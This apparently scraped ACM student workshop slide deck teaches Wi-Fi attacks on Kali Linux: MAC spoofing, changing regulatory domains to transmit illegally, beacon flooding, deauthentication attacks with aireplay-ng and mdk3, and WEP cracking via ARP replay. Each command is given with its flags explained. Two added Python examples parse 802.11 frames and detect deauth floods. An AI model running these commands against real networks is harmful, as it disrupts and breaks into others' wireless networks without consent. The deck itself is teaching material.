ACM Wi-Fi Workshop
Presented By: Chris Rawlings
Brad Emge

Disclaimer
• By participating in this workshop you agree to be hacked for demonstration purposes only. Don't worry, no personal data will be collected or stored.
• Tools demonstrated in this panel are legitimate devices that comply with all the necessary rules and regulations and are used by Governments and Penetration testers to conduct lawful spying and security audits.
• The contents of this file are for educational purposes only. It is strongly suggested that you do not use this knowledge for illegal purposes.

Information
• All steps in this slide show were performed and tested on 32-bit Kali Linux version 1.0.6 with an Alfa AWUS036H USB wireless card (these are the operating system and wireless card you have in front of you).
• Any statement that begins with '#' is a command to be typed in the terminal

What is Kali Linux
• Debian based Linux operating system
• Designed for the sole purpose of penetration testing, exploitation, and hacking

Booting into Kali Linux
• Start with computer off
• Plug in flash drive and USB wireless card
• Boot the computer off of the USB flash drive
• From YUMI select system tools then kali
• Select live (686-pae) from the boot menu

Post Kali Boot
• Make sure that your computer is not in "airplane" mode
– Click applications → system tools → preferences → system settings → network
– Make sure airplane mode is off
– Close that window

Temporarily Connecting to The Internet
• Click the network icon in the upper right
– Looks like two computers with a red circle and an X
• Select the MST-PSK-N network
• Make sure you are connecting with the non-realtek wireless adapter
• Enter the password "JoeMiner"

Getting Necessary Files
• Open the terminal
• Type #wget http://tinyurl.com/acmwifiworkshopfiles
• Open root under the places menu
• Unzip the file and make sure the files are all in the root folder

Terms and Definitions
• Access Point (AP)
• Bandwidth
• Channel
• Evil Twin
• Frequency
• Honeypot
• IEEE 802.11
• IP Address
• ISM Band
• MAC Address
• Modes of Wi-Fi
• NIC
• Packet
• Rainbow Table
• WEP
• Wi-Fi
• WPA
• WPA2
• WPS

FINDING THE CORRECT WIRELESS CARD

Open the terminal

Type #airmon-ng

FINDING YOUR MAC ADDRESS

Type #ifconfig wlan1
• ifconfig – program we are using
• wlan1 – interface we want information on

CHANGING YOUR MAC ADDRESS

Type #ifconfig wlan1 down
• ifconfig – program that we are running
• wlan1 – interface we are operating on
• down – disable the interface

Type #macchanger -m de:ad:be:ef:c0:fe wlan1
• macchanger – program we are using
• -m – manually set the MAC address
• de:ad:be:ef:c0:fe – MAC address of your choice
• wlan1 – interface we are changing the MAC of

Type #ifconfig wlan1 up
• ifconfig – program that we are running
• wlan1 – interface we are operating on
• up – enable the interface

Type #ifconfig wlan1
• ifconfig – program we are using
• wlan1 – interface we are interested in

RANDOMLY CHANGING YOUR MAC ADDRESS

Type #ifconfig wlan1 down
• ifconfig – program that we are running
• wlan1 – interface we are operating on
• down – disable the interface

Type #macchanger -r wlan1
• macchanger – program we are using
• -r – random MAC address
• wlan1 – interface we are operating on

Type #ifconfig wlan1 up
• ifconfig – program we are using
• wlan1 – interface we are interested in
• up – enable the interface

Type #ifconfig wlan1
• ifconfig – the program we are using
• wlan1 – the interface we are interested in

CHANGING YOUR MAC ADDRESS BACK TO ITS FACTORY SETTING

Type #ifconfig wlan1 down
• ifconfig – program that we are running
• wlan1 – interface we are operating on
• down – disable the interface

Type #macchanger -p wlan1
• macchanger – the program we are using
• -p – changes the MAC back to factory settings
• wlan1 – the interface we are operating on

Type #ifconfig wlan1 up
• ifconfig – program we are using
• wlan1 – interface we are interested in
• up – enable the interface

Type #ifconfig wlan1
• ifconfig – the program we are using
• wlan1 – the interface we are interested in

CHANGING THE CHANNEL OF YOUR WIRELESS CARD

Type #iwconfig wlan1
• iwconfig – program we are using
• wlan1 – interface we are interested in

Type #iwconfig wlan1 channel c
• iwconfig – program we are using
• wlan1 – interface we are operating on
• channel – allows you to change the channel
• c – specific channel you wish to use: 1, 2, 3…

Type #iwconfig wlan1
• iwconfig – program we are using
• wlan1 – interface we are interested in

OPERATING OUTSIDE OF US REGULATION FREQUENCIES

Type #iw reg get
• iw – program we are using
• reg – short for regulation
• get – show the iw regulation settings

Type #iw reg set JP
• iw – program we are using
• reg – short for regulation
• set – allows us to set the country regulation
• JP – country code for Japan
• allows us to operate on channels 12, 13, & 14

Type #iw reg get
• iw – program we are using
• reg – short for regulation
• get – show the iw regulation settings

Type #iwconfig wlan1 channel 14
• iwconfig – program we are using
• wlan1 – interface we are operating on
• channel – allows us to set the channel
• 14 – channel we are setting

Type #iwconfig wlan1
• iwconfig – program we are using
• wlan1 – interface we are interested in

CHANGING THE CHANNEL BACK TO A LEGAL FREQUENCY

Type #iwconfig wlan1 channel c
• iwconfig – program we are using
• wlan1 – interface we are operating on
• channel – allows you to change the channel
• c – specific channel you wish to use: 1, 2, 3…

OPERATING YOUR WIRELESS CARD WITH MORE POWER

Type #iwconfig wlan1
• iwconfig – program we are using
• wlan1 – interface we are operating on

Type #iw reg set BO
• iw – program we are using
• reg – short for regulation
• set – allows us to set the country regulation
• BO – country code for Bolivia

Type #iwconfig wlan1 txpower 30
• iwconfig – program we are using
• wlan1 – interface we are operating on
• txpower – stands for transmit power
• 30 – power output in dBm

Type #iwconfig wlan1
• iwconfig – program we are using
• wlan1 – interface we are operating on

Note on Transmit Power
• The power output has increased from 0.1 Watt to 1 Watt
• With our current equipment (Wi-Fi card and antenna) we will not be violating FCC regulation; however, with a higher gain antenna we could be

FINDING THE MODES YOUR WIRELESS CARD SUPPORTS

Type #airmon-ng
• airmon-ng – program we are using

Type #iw phy phy0 info | grep -A3 modes
• iw – program we are using
• phy – search based upon physical device number
• phy0 – physical device number from airmon-ng
• info – give us the info about the phy0 device
• | grep – pipes the output into the program grep
• -A3 – indicates to output 3 lines after the given search term
• modes – the term we are searching for with grep

Modes Supported
• IBSS
– ad-hoc mode
– computer to computer connection
• managed
– allows you to connect to networks
– your Wi-Fi card is usually in managed mode
• monitor
– promiscuous mode
– allows you to view traffic not destined to your card

OPERATING YOUR CARD IN AD-HOC MODE

Type #ifconfig wlan1 down
• ifconfig – program that we are running
• wlan1 – interface we are operating on
• down – disable the interface

Type #iwconfig wlan1 mode ad-hoc
• iwconfig – program we are using
• wlan1 – interface we are operating on
• mode – allows us to set a specific mode
• ad-hoc – the mode we will be using

Type #iwconfig wlan1 channel 1
• iwconfig – program we are using
• wlan1 – interface we are operating on
• channel – allows us to change the channel
• 1 – specific channel we are using: 1, 2, 3…

Type #iwconfig wlan1 essid 'nameofnetwork'
• iwconfig – program we are using
• wlan1 – interface we are operating on
• essid – allows us to set the network name
• 'nameofnetwork' – name of the network

Type #iwconfig wlan1 key s:'password'
• iwconfig – program we are using
• wlan1 – interface we are operating on
• key
– allows us to operate a network with a WEP key
– a WPA/WPA2 key is not possible (I think)
• s: – indicates the key entered is in ASCII
• 'password' – the key as an ASCII string

Type #ifconfig wlan1 up
• ifconfig – program we are using
• wlan1 – interface we are operating on
• up – enable the interface

Type #iwconfig wlan1
• iwconfig – the program we are using
• wlan1 – the interface we are operating on

TURNING OFF AD-HOC MODE

Type #iwconfig wlan1 mode managed
• iwconfig – program we are using
• wlan1 – interface we are operating on
• mode – allows us to change the mode of the adapter
• managed – sets managed mode

OPERATING YOUR CARD IN MONITOR MODE

Type #airmon-ng start wlan1
• airmon-ng – program we are using
• start – enables monitor mode
• wlan1 – interface we wish to enable monitor mode on

Type #kill 3018 & kill 3853
• kill – command to stop programs from running
• 3018 – PID of process from slide before
• & – separates the two commands so both fit on one line (the shell runs the first one in the background)

Type #iwconfig
• iwconfig – program we are using

DATA GATHERING IN MONITOR MODE

Type #tshark -i mon0
• tshark
– program we are using
– terminal wireshark
• -i – interface
• mon0 – interface we are operating on

Type ctrl-c
• ctrl-c – stops the running program

Type #airodump-ng mon0
• airodump-ng – program we are using
• mon0 – interface we wish to view wireless traffic on

#airodump-ng mon0
• BSSID – MAC address of access point
• station – MAC address of connected client
• Probe – shows what access points a station is looking for

Type ctrl-c
• ctrl-c – stops the running program

BEACON FLOODING

What are Beacons
• Management Frame in IEEE 802.11 (Wi-Fi)
• Transmitted to announce the presence of a network
• Includes information such as the name, the channel, supported data speeds, whether or not it is encrypted, etc.

Type #nano ssidlist
• nano
– text editor I am using
– you may use something else if you prefer
• ssidlist – filename for the text file that will contain the SSIDs we will be broadcasting

Type different network names on separate lines

Type ctrl-x, y, enter
• This saves the file in nano
• you could also write out the file and then exit
• this may be different if you didn't use nano

Type #mdk3 mon0 b -f ssidlist
• mdk3 – program we are using
• mon0 – interface we are operating on
• b – means to send out beacon frames
• ssidlist – text file with the network names in it

Type ctrl-c to stop
• stops the running program

VIEWING PROBE REQUESTS

What are Probe Requests
• Management Frame in IEEE 802.11 (Wi-Fi)
• A packet sent from a client (computer, phone, etc.) to see if a network is within range
• Your devices are constantly sending out Probe Requests and we can view them (also exploit them, but that's later)
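
Added example (not part of the original workshop slides): a Python parser that pulls the fields named on the "What are Beacons" and "What are Probe Requests" slides (network name, channel, data rates, encryption flag, and the SSID a client is asking for) out of raw 802.11 management frames. The two sample frames, their MAC addresses and their network names are constructed for illustration, and frames are assumed to start at the 802.11 header with any radiotap header and FCS already removed.

```python
import struct

SUBTYPES = {4: "probe-request", 8: "beacon"}  # management (type 0) subtypes


def mac(raw):
    return ":".join(f"{b:02x}" for b in raw)


def parse_tags(body):
    """Walk the tagged parameters: 1-byte id, 1-byte length, then the value."""
    tags, i = {}, 0
    while i + 2 <= len(body):
        tag_id, length = body[i], body[i + 1]
        value = body[i + 2:i + 2 + length]
        if len(value) < length:  # truncated element: stop instead of guessing
            break
        tags.setdefault(tag_id, value)  # keep the first occurrence of each id
        i += 2 + length
    return tags


def parse_mgmt_frame(frame):
    """Return the advertised fields of a beacon or probe request as a dict."""
    if len(frame) < 24:
        raise ValueError("shorter than the 24-byte management header")
    # Frame-control byte 0: version (2 bits), type (2 bits), subtype (4 bits).
    ftype, subtype = (frame[0] >> 2) & 0x3, (frame[0] >> 4) & 0xF
    if ftype != 0 or subtype not in SUBTYPES:
        raise ValueError("not a beacon or probe request")
    info = {
        "kind": SUBTYPES[subtype],
        "dst": mac(frame[4:10]),
        "src": mac(frame[10:16]),
        "bssid": mac(frame[16:22]),
    }
    body = frame[24:]
    if subtype == 8:
        # Beacons carry 12 fixed bytes before the tags:
        # timestamp (8), beacon interval (2), capability info (2).
        if len(body) < 12:
            raise ValueError("beacon body truncated")
        _timestamp, interval, capab = struct.unpack_from("<QHH", body)
        info["beacon_interval_tu"] = interval
        info["privacy"] = bool(capab & 0x0010)  # set when encryption is required
        body = body[12:]
    tags = parse_tags(body)
    ssid = tags.get(0)
    # An empty SSID is a hidden network (beacon) or a wildcard probe.
    info["ssid"] = None if ssid is None else ssid.decode("utf-8", "replace")
    # Supported rates: low 7 bits are the rate in 500 kbit/s units.
    info["rates_mbps"] = [(r & 0x7F) / 2 for r in tags.get(1, b"")]
    ds = tags.get(3)  # DS Parameter Set holds the current channel
    info["channel"] = ds[0] if ds else None
    info["rsn"] = 48 in tags  # RSN element present means WPA2
    return info


# --- constructed sample frames (not captured from a real network) ---
BCAST = b"\xff" * 6
AP = bytes.fromhex("020000000001")
CLIENT = bytes.fromhex("020000000002")
RATES = b"\x01\x04\x82\x84\x8b\x96"  # 1, 2, 5.5 and 11 Mbit/s

SAMPLE_BEACON = (
    b"\x80\x00\x00\x00" + BCAST + AP + AP + b"\x00\x00"
    + struct.pack("<QHH", 0, 100, 0x0011)  # ESS + privacy bits
    + b"\x00\x07LabNet1" + RATES + b"\x03\x01\x06"
)
SAMPLE_PROBE = (
    b"\x40\x00\x00\x00" + BCAST + CLIENT + BCAST + b"\x00\x00"
    + b"\x00\x08HomeWifi" + RATES
)

if __name__ == "__main__":
    for sample in (SAMPLE_BEACON, SAMPLE_PROBE):
        print(parse_mgmt_frame(sample))
```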

Type #airodump-ng mon0
• airodump-ng – program we are using
• mon0 – interface we are operating on

#airodump-ng mon0
• In a very dense Wi-Fi environment, we will be unable to see the probe requests at first
• to fix this
– zoom out (available from the view menu)
– stop the program with ctrl-c
– zoom in (available from the view menu)

PASSIVE NETWORK SCAN

Type #iw dev wlan1 scan passive | grep SSID
• iw – program we are using
• dev – indicates that we are identifying our Wi-Fi card by device number and not physical number
• wlan1 – interface we wish to scan on
• passive – indicates that no packets should be sent
• | grep – program that is used to search the output
• SSID – the word that grep will be searching for

ACTIVE NETWORK SCAN

Type #iwlist wlan1 scan | grep ESSID
• iwlist – program we are using
• wlan1 – interface we are scanning on
• scan – indicates we wish to scan
• | grep – program used to search the output of iwlist
• ESSID – the word we are searching for with grep

DEAUTHENTICATION
![Page 138: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/138.jpg)
What is Deauthentication
• Management Frame in IEEE 802.11(Wi-Fi)
• Allows clients to be kicked off of a wireless access point
• These occur naturally in wireless traffic and users do not even notice them
• We can send excessive amounts of these packets to prevent a client from connecting
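Because a few deauthentication frames are normal and only an excessive number indicates a problem, a monitor can separate the two by rate. The following is an added example, not part of the original workshop slides: it parses bare 802.11 management-frame headers and flags any access point/station pair that receives too many deauthentication or disassociation frames in a short window. The window, the threshold, the MAC addresses and the sample frames are all constructed assumptions.

```python
"""Deauth/disassoc flood detector (added example; thresholds and frames are assumptions)."""
import struct
from collections import defaultdict, deque

SUBTYPES = {10: "disassoc", 12: "deauth"}  # management subtypes that drop a client
WINDOW_S = 5.0    # assumed sliding window, in seconds
THRESHOLD = 10    # assumed frame count per (BSSID, station) inside the window


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def parse_deauth(frame):
    """Return a dict for a deauth/disassoc frame, None for anything else.

    Expects the bare 802.11 MAC header (any radiotap header already stripped).
    """
    if len(frame) < 26:                      # 24-byte header + 2-byte reason code
        return None
    fc0, fc1 = frame[0], frame[1]
    version, ftype, subtype = fc0 & 0x03, (fc0 >> 2) & 0x03, fc0 >> 4
    if version != 0 or ftype != 0 or subtype not in SUBTYPES:
        return None                          # not a management frame of interest
    dst, src, bssid = (mac_str(frame[i:i + 6]) for i in (4, 10, 16))
    protected = bool(fc1 & 0x40)             # Protected Frame bit: body is encrypted
    reason = None if protected else struct.unpack_from("<H", frame, 24)[0]
    station = dst if src == bssid else src   # the non-AP side of the exchange
    return {"kind": SUBTYPES[subtype], "bssid": bssid, "station": station,
            "reason": reason, "protected": protected}


def detect_deauth_flood(events, window=WINDOW_S, threshold=THRESHOLD):
    """events: iterable of (timestamp_seconds, frame_bytes). Returns a list of alerts."""
    recent = defaultdict(deque)   # (bssid, station) -> timestamps inside the window
    alerting = set()              # pairs already reported and still above threshold
    alerts = []
    for ts, frame in sorted(events, key=lambda e: e[0]):
        info = parse_deauth(frame)
        if info is None:
            continue
        key = (info["bssid"], info["station"])
        seen = recent[key]
        seen.append(ts)
        while seen and ts - seen[0] > window:
            seen.popleft()
        if len(seen) < threshold:
            alerting.discard(key)            # rate fell back to normal, re-arm
        elif key not in alerting:
            alerting.add(key)
            alerts.append({"bssid": key[0], "station": key[1],
                           "first_seen": seen[0], "count": len(seen)})
    return alerts


def build_frame(subtype, dst, src, bssid, reason=0):
    """Construct a bare management frame for the sample data (not captured traffic)."""
    raw = lambda m: bytes.fromhex(m.replace(":", ""))
    header = struct.pack("<BBH", subtype << 4, 0, 0) + raw(dst) + raw(src) + raw(bssid)
    return header + struct.pack("<HH", 0, reason)   # sequence control, reason code


# Constructed sample: locally administered MAC addresses, invented timestamps.
AP, STA_A, STA_B = "02:00:00:00:00:01", "02:00:00:00:00:0a", "02:00:00:00:00:0b"
SAMPLE_EVENTS = [
    (0.5, build_frame(8, "ff:ff:ff:ff:ff:ff", AP, AP)),   # beacon, ignored
    (1.0, build_frame(12, AP, STA_A, AP, reason=3)),       # one client leaving
    (40.0, build_frame(10, AP, STA_A, AP, reason=8)),      # one disassociation
] + [
    (10.0 + i * 0.01, build_frame(12, STA_B, AP, AP, reason=7)) for i in range(30)
]

if __name__ == "__main__":
    for alert in detect_deauth_flood(SAMPLE_EVENTS):
        print("possible deauth flood:", alert)
```

Only the burst aimed at the second station is reported; the isolated frames from the first station stay below the threshold.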
![Page 139: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/139.jpg)
DEAUTHENTICATION DIRECTED AT A PARTICULAR CLIENT
![Page 140: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/140.jpg)
Type #airodump-ng mon0
• airodump-ng– program we are using
• mon0– interface we are operating on
![Page 141: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/141.jpg)
#airodump-ng mon0
![Page 142: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/142.jpg)
#airodump-ng mon0
• type ctrl-c when you have finished finding your target
![Page 143: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/143.jpg)
Type #iwconfig mon0 channel 11
• iwconfig– program we are using
• mon0– interface we are changing the channel of
• channel– indicates we are changing the channel
• 11– channel we are changing to
![Page 144: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/144.jpg)
#iwconfig mon0 channel 11
![Page 145: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/145.jpg)
Type #aireplay-ng --ignore-negative-one -0 10 -a 00:1a:c4:51:3c:31 -c d4:20:6d:41:78:b2 mon0
• aireplay-ng– program we are using
• --ignore-negative-one– needed because of a potential driver issue– you may be able to get it to work without this
• -0– indicates deauthentication packet
• 10– number of deauths to send
• -a 00:1a:c4:51:3c:31– access point MAC address
• -c d4:20:6d:41:78:b2– client MAC address
• mon0– interface to send deauth packets out on
![Page 146: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/146.jpg)
#aireplay-ng --ignore-negative-one -0 10 -a 00:1a:c4:51:3c:31 -c d4:20:6d:41:78:b2 mon0
![Page 147: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/147.jpg)
DEAUTHENTICATION DIRECTED TOWARD A SPECIFIC NETWORK
![Page 148: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/148.jpg)
Type #airodump-ng mon0
• airodump-ng– program we are using
• mon0– interface we are using
![Page 149: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/149.jpg)
#airodump-ng mon0
![Page 150: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/150.jpg)
#airodump-ng mon0
• type ctrl-c when you have finished finding your target
![Page 151: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/151.jpg)
Type #iwconfig mon0 channel 11
• iwconfig– program we are using
• mon0– interface we are changing the channel of
• channel– indicates we are changing the channel
• 11– channel we are changing to
![Page 152: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/152.jpg)
#iwconfig mon0 channel 11
![Page 153: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/153.jpg)
Type #nano blacklist
• nano– text editor we are using– you may use something else if you prefer
• blacklist– name of the text file we are editing
![Page 154: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/154.jpg)
#nano blacklist
![Page 155: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/155.jpg)
#nano blacklist
![Page 156: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/156.jpg)
#nano blacklist
• Separate MAC addresses by putting them on separate lines. In this case we are only targeting a single Access Point
• Type ctrl-x, y, enter– this saves the file
![Page 157: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/157.jpg)
Type #mdk3 mon0 d -b blacklist -c 11
• mdk3– program we are using
• mon0– interface we are deauthenticating from
• d– indicates deauthentication packets are to be sent
• -b– indicates that we are using a blacklist. We want to attack the indicated access points
• blacklist– file that has the list of MAC addresses to deauth
• -c– indicates what channel to use
• 11– channel the access points are operating on
![Page 158: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/158.jpg)
#mdk3 mon0 d -b blacklist -c 11
![Page 159: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/159.jpg)
#mdk3 mon0 d -b blacklist -c 11
• type ctrl-c to stop the program
![Page 160: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/160.jpg)
DEAUTHENTICATION DIRECTED TOWARD MULTIPLE NETWORKS
![Page 161: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/161.jpg)
Type #airodump-ng mon0
• airodump-ng– program we are using
• mon0– interface we are using
![Page 162: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/162.jpg)
#airodump-ng mon0
![Page 163: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/163.jpg)
Type #nano blacklist
• nano– text editor we are using– you may use something else if you prefer
• blacklist– name of the text file we are editing
![Page 164: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/164.jpg)
#nano blacklist
![Page 165: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/165.jpg)
#nano blacklist
![Page 166: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/166.jpg)
#nano blacklist
• Separate MAC addresses by putting them on separate lines. In this case we are only targeting a single Access Point
• Type ctrl-x, y, enter– this saves the file
![Page 167: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/167.jpg)
Type #mdk3 mon0 d -b blacklist -c 6,11
• mdk3– program we are using
• mon0– interface we are deauthenticating from
• d– indicates deauthentication packets are to be sent
• -b– indicates that we are using a blacklist. We want to attack the indicated access points
• blacklist– file that has the list of MAC addresses to deauth
• -c– indicates what channel to use
• 6,11– channels the access points are operating on
![Page 168: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/168.jpg)
#mdk3 mon0 d -b blacklist -c 6,11
![Page 169: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/169.jpg)
#mdk3 mon0 d -b blacklist -c 6,11
• type ctrl-c to stop the program
![Page 170: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/170.jpg)
CLIENTS FORCED TO CONNECT TO A SPECIFIC ACCESS POINT
![Page 171: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/171.jpg)
Type #airodump-ng mon0
• airodump-ng– program we are using
• mon0– interface we are operating on
![Page 172: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/172.jpg)
#airodump-ng mon0
![Page 173: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/173.jpg)
#airodump-ng mon0
• type ctrl-c when done finding the access point you wish clients to connect to
![Page 174: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/174.jpg)
Type #nano whitelist
• nano– text editor we are using– you may use something else if you prefer
• whitelist– text file with the list of MAC addresses of the access points you want clients to be able to connect to
![Page 175: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/175.jpg)
#nano whitelist
![Page 176: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/176.jpg)
#nano whitelist
![Page 177: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/177.jpg)
#nano whitelist
• note that it is possible to enter multiple MAC addresses in this file as well
• type ctrl-x, y, enter when finished
![Page 178: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/178.jpg)
Type #mdk3 mon0 d -w whitelist
• mdk3– program we are using
• mon0– interface to send deauth packets from
• d– indicates to deauthenticate clients
• -w– indicates we are whitelisting specific access points
• whitelist– text file that contains the MAC address of the AP we want clients to connect to– deauths all APs other than those on this list
![Page 179: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/179.jpg)
#mdk3 mon0 d -w whitelist
![Page 180: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/180.jpg)
#mdk3 mon0 d -w whitelist
• type ctrl-c when done sending deauth packets
![Page 181: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/181.jpg)
BREAKING ENCRYPTION
![Page 182: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/182.jpg)
BREAKING WEP ENCRYPTION
![Page 183: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/183.jpg)
Breaking WEP Encryption
![Page 184: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/184.jpg)
Breaking WEP Encryption
• Steps
  – Identify Network
  – Begin collecting data
  – Cause extra data to be generated
    • optional
    • should be skipped if conducting a passive attack
  – Start cracking once the number of Initialization Vectors (IVs) reaches 50,000
![Page 185: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/185.jpg)
Type #airodump-ng mon0
• airodump-ng– program we are using
• mon0– interface we are operating on
![Page 186: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/186.jpg)
#airodump-ng mon0
![Page 187: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/187.jpg)
#airodump-ng mon0
• Notice that in the ENC column it says WEP.
• Any WEP encrypted access point is vulnerable.
• type ctrl-c when you have finished finding your target
![Page 188: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/188.jpg)
#airodump-ng mon0
![Page 189: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/189.jpg)
#airodump-ng mon0
![Page 190: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/190.jpg)
Breaking WEP Encryption
• open a new tab in the terminal window
• File > New Tab
![Page 191: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/191.jpg)
Type #aireplay-ng --ignore-negative-one -1 0 -a 12:18:0a:21:ae:e4 -h 00:c0:ca:75:6f:ab mon0
• aireplay-ng– program we are using
• --ignore-negative-one– needed because of a potential driver issue– this may not be needed
• -1– Associates with the Access Point
• -a 12:18:0a:21:ae:e4– indicates the MAC address of the AP, followed by the MAC of the AP
• -h 00:c0:ca:75:6f:ab– sets the source MAC address, followed by the MAC of our wireless card
• mon0– interface we are operating on
![Page 192: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/192.jpg)
Type #aireplay-ng --ignore-negative-one -1 0 -a 12:18:0a:21:ae:e4 -h 00:c0:ca:75:6f:ab mon0
![Page 193: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/193.jpg)
Type #aireplay-ng --ignore-negative-one -3 -b 12:18:0a:21:ae:e4 -h 00:c0:ca:75:6f:ab mon0
• aireplay-ng– program we are using
• --ignore-negative-one– needed because of a potential driver issue– this may not be needed
• -3– ARP Request Replay Attack– most effective way to generate new IVs
• -b 12:18:0a:21:ae:e4– indicates the MAC address of the AP, followed by the MAC of the AP
• -h 00:c0:ca:75:6f:ab– sets the source MAC address, followed by the MAC of our wireless card
• mon0– interface we are operating on
![Page 194: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/194.jpg)
#aireplay-ng --ignore-negative-one -3 -b 12:18:0a:21:ae:e4 -h 00:c0:ca:75:6f:ab mon0
